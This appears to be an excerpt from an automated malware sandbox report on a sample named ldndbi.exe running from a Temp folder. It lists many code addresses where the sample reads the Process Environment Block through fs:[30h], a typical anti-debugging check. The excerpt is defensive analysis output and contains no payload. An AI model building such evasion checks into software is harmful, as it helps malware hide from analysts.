Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A1B1E1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B1E1 mov eax, dword ptr fs:[00000030h] 3_2_00A1B1E1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AA41E8 mov eax, dword ptr fs:[00000030h] 3_2_00AA41E8
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov eax, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A34120 mov ecx, dword ptr fs:[00000030h] 3_2_00A34120
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4513A mov eax, dword ptr fs:[00000030h] 3_2_00A4513A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4513A mov eax, dword ptr fs:[00000030h] 3_2_00A4513A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h] 3_2_00A19100
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h] 3_2_00A19100
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19100 mov eax, dword ptr fs:[00000030h] 3_2_00A19100
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1C962 mov eax, dword ptr fs:[00000030h] 3_2_00A1C962
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B171 mov eax, dword ptr fs:[00000030h] 3_2_00A1B171
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1B171 mov eax, dword ptr fs:[00000030h] 3_2_00A1B171
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3B944 mov eax, dword ptr fs:[00000030h] 3_2_00A3B944
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3B944 mov eax, dword ptr fs:[00000030h] 3_2_00A3B944
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A152A5 mov eax, dword ptr fs:[00000030h] 3_2_00A152A5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A2AAB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2AAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A2AAB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4FAB0 mov eax, dword ptr fs:[00000030h] 3_2_00A4FAB0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4D294 mov eax, dword ptr fs:[00000030h] 3_2_00A4D294
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4D294 mov eax, dword ptr fs:[00000030h] 3_2_00A4D294
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42AE4 mov eax, dword ptr fs:[00000030h] 3_2_00A42AE4
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42ACB mov eax, dword ptr fs:[00000030h] 3_2_00A42ACB
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A54A2C mov eax, dword ptr fs:[00000030h] 3_2_00A54A2C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A54A2C mov eax, dword ptr fs:[00000030h] 3_2_00A54A2C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A28A0A mov eax, dword ptr fs:[00000030h] 3_2_00A28A0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h] 3_2_00A15210
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A15210 mov ecx, dword ptr fs:[00000030h] 3_2_00A15210
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h] 3_2_00A15210
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A15210 mov eax, dword ptr fs:[00000030h] 3_2_00A15210
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A1AA16
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1AA16 mov eax, dword ptr fs:[00000030h] 3_2_00A1AA16
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ADAA16
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADAA16 mov eax, dword ptr fs:[00000030h] 3_2_00ADAA16
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A33A1C mov eax, dword ptr fs:[00000030h] 3_2_00A33A1C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACB260 mov eax, dword ptr fs:[00000030h] 3_2_00ACB260
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACB260 mov eax, dword ptr fs:[00000030h] 3_2_00ACB260
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8A62 mov eax, dword ptr fs:[00000030h] 3_2_00AE8A62
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A5927A mov eax, dword ptr fs:[00000030h] 3_2_00A5927A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h] 3_2_00A19240
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h] 3_2_00A19240
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h] 3_2_00A19240
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A19240 mov eax, dword ptr fs:[00000030h] 3_2_00A19240
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADEA55 mov eax, dword ptr fs:[00000030h] 3_2_00ADEA55
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AA4257 mov eax, dword ptr fs:[00000030h] 3_2_00AA4257
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h] 3_2_00A44BAD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h] 3_2_00A44BAD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44BAD mov eax, dword ptr fs:[00000030h] 3_2_00A44BAD
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE5BA5 mov eax, dword ptr fs:[00000030h] 3_2_00AE5BA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD138A mov eax, dword ptr fs:[00000030h] 3_2_00AD138A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACD380 mov ecx, dword ptr fs:[00000030h] 3_2_00ACD380
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A21B8F mov eax, dword ptr fs:[00000030h] 3_2_00A21B8F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A21B8F mov eax, dword ptr fs:[00000030h] 3_2_00A21B8F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42397 mov eax, dword ptr fs:[00000030h] 3_2_00A42397
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4B390 mov eax, dword ptr fs:[00000030h] 3_2_00A4B390
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A403E2 mov eax, dword ptr fs:[00000030h] 3_2_00A403E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3DBE9 mov eax, dword ptr fs:[00000030h] 3_2_00A3DBE9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A953CA mov eax, dword ptr fs:[00000030h] 3_2_00A953CA
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A953CA mov eax, dword ptr fs:[00000030h] 3_2_00A953CA
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD131B mov eax, dword ptr fs:[00000030h] 3_2_00AD131B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1DB60 mov ecx, dword ptr fs:[00000030h] 3_2_00A1DB60
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A43B7A mov eax, dword ptr fs:[00000030h] 3_2_00A43B7A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A43B7A mov eax, dword ptr fs:[00000030h] 3_2_00A43B7A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1DB40 mov eax, dword ptr fs:[00000030h] 3_2_00A1DB40
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8B58 mov eax, dword ptr fs:[00000030h] 3_2_00AE8B58
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1F358 mov eax, dword ptr fs:[00000030h] 3_2_00A1F358
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2849B mov eax, dword ptr fs:[00000030h] 3_2_00A2849B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD14FB mov eax, dword ptr fs:[00000030h] 3_2_00AD14FB
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A96CF0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A96CF0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96CF0 mov eax, dword ptr fs:[00000030h] 3_2_00A96CF0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8CD6 mov eax, dword ptr fs:[00000030h] 3_2_00AE8CD6
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4BC2C mov eax, dword ptr fs:[00000030h] 3_2_00A4BC2C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h] 3_2_00AE740D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h] 3_2_00AE740D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE740D mov eax, dword ptr fs:[00000030h] 3_2_00AE740D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h] 3_2_00A96C0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h] 3_2_00A96C0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h] 3_2_00A96C0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96C0A mov eax, dword ptr fs:[00000030h] 3_2_00A96C0A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1C06 mov eax, dword ptr fs:[00000030h] 3_2_00AD1C06
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3746D mov eax, dword ptr fs:[00000030h] 3_2_00A3746D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A44B mov eax, dword ptr fs:[00000030h] 3_2_00A4A44B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAC450 mov eax, dword ptr fs:[00000030h] 3_2_00AAC450
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAC450 mov eax, dword ptr fs:[00000030h] 3_2_00AAC450
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE05AC mov eax, dword ptr fs:[00000030h] 3_2_00AE05AC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE05AC mov eax, dword ptr fs:[00000030h] 3_2_00AE05AC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A435A1 mov eax, dword ptr fs:[00000030h] 3_2_00A435A1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A41DB5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A41DB5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A41DB5 mov eax, dword ptr fs:[00000030h] 3_2_00A41DB5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h] 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h] 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h] 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A42581 mov eax, dword ptr fs:[00000030h] 3_2_00A42581
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A12D8A mov eax, dword ptr fs:[00000030h] 3_2_00A12D8A
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A4FD9B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4FD9B mov eax, dword ptr fs:[00000030h] 3_2_00A4FD9B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A2D5E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2D5E0 mov eax, dword ptr fs:[00000030h] 3_2_00A2D5E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ADFDE2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ADFDE2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ADFDE2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADFDE2 mov eax, dword ptr fs:[00000030h] 3_2_00ADFDE2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AC8DF1 mov eax, dword ptr fs:[00000030h] 3_2_00AC8DF1
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov ecx, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A96DC9 mov eax, dword ptr fs:[00000030h] 3_2_00A96DC9
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1AD30 mov eax, dword ptr fs:[00000030h] 3_2_00A1AD30
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ADE539 mov eax, dword ptr fs:[00000030h] 3_2_00ADE539
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A23D34 mov eax, dword ptr fs:[00000030h] 3_2_00A23D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8D34 mov eax, dword ptr fs:[00000030h] 3_2_00AE8D34
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A9A537 mov eax, dword ptr fs:[00000030h] 3_2_00A9A537
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h] 3_2_00A44D3B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h] 3_2_00A44D3B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A44D3B mov eax, dword ptr fs:[00000030h] 3_2_00A44D3B
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3C577 mov eax, dword ptr fs:[00000030h] 3_2_00A3C577
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3C577 mov eax, dword ptr fs:[00000030h] 3_2_00A3C577
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A53D43 mov eax, dword ptr fs:[00000030h] 3_2_00A53D43
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A93540 mov eax, dword ptr fs:[00000030h] 3_2_00A93540
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A37D50 mov eax, dword ptr fs:[00000030h] 3_2_00A37D50
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AE0EA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AE0EA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE0EA5 mov eax, dword ptr fs:[00000030h] 3_2_00AE0EA5
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A946A7 mov eax, dword ptr fs:[00000030h] 3_2_00A946A7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AAFE87 mov eax, dword ptr fs:[00000030h] 3_2_00AAFE87
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A276E2 mov eax, dword ptr fs:[00000030h] 3_2_00A276E2
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A416E0 mov ecx, dword ptr fs:[00000030h] 3_2_00A416E0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A58EC7 mov eax, dword ptr fs:[00000030h] 3_2_00A58EC7
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A436CC mov eax, dword ptr fs:[00000030h] 3_2_00A436CC
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACFEC0 mov eax, dword ptr fs:[00000030h] 3_2_00ACFEC0
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AE8ED6 mov eax, dword ptr fs:[00000030h] 3_2_00AE8ED6
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1E620 mov eax, dword ptr fs:[00000030h] 3_2_00A1E620
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00ACFE3F mov eax, dword ptr fs:[00000030h] 3_2_00ACFE3F
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h] 3_2_00A1C600
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h] 3_2_00A1C600
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A1C600 mov eax, dword ptr fs:[00000030h] 3_2_00A1C600
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A48E00 mov eax, dword ptr fs:[00000030h] 3_2_00A48E00
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00AD1608 mov eax, dword ptr fs:[00000030h] 3_2_00AD1608
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A61C mov eax, dword ptr fs:[00000030h] 3_2_00A4A61C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A4A61C mov eax, dword ptr fs:[00000030h] 3_2_00A4A61C
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A2766D mov eax, dword ptr fs:[00000030h] 3_2_00A2766D
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A3AE73 mov eax, dword ptr fs:[00000030h] 3_2_00A3AE73
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
Source: C:\Users\user\AppData\Local\Temp\ldndbi.exe Code function: 3_2_00A27E41 mov eax, dword ptr fs:[00000030h] 3_2_00A27E41
